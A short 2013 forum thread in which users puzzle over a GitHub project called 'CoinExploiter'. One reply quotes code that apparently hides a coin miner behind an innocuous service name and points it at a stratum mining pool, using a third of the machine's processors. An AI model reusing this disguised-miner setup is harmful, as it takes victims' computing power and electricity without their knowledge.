Author

Topic: The fuck is this? (Read 595 times)

sr. member
Activity: 812
Merit: 250
The Fourth Generation of Blockchain in DeFi
December 16, 2013, 06:25:16 PM
#4
pretty much explains itself:
Code:
$serviceName = "ASDFService"
$processName = "coin-miner.exe"
$filePath = "C:\Program Files (x86)\Ufasoft\Coin\coin-miner.exe"
$poolName = "birgitbonander.1:[email protected]"
$port = 7777
$nProcessors = Floor(EnvGet("NUMBER_OF_PROCESSORS")/3)
$cmdString = """" & $filePath & """" & " -o stratum+tcp://" & $poolName & ":" & $port & " -g no -t " & $nProcessors
newbie
Activity: 28
Merit: 0
December 16, 2013, 06:18:14 PM
#3
No really you should not try if you don't know Grin
hero member
Activity: 672
Merit: 501
December 16, 2013, 06:13:58 PM
#2
https://github.com/Birgitbonander/CoinExploiter

Just browsing around Github and found this...don't know to compile on Windows and probably wouldn't anyway, lol
ITS A TRAPPP!!!! lol jk
hero member
Activity: 896
Merit: 500
December 16, 2013, 06:11:24 PM
#1
https://github.com/Birgitbonander/CoinExploiter

Just browsing around Github and found this...don't know to compile on Windows and probably wouldn't anyway, lol
Jump to: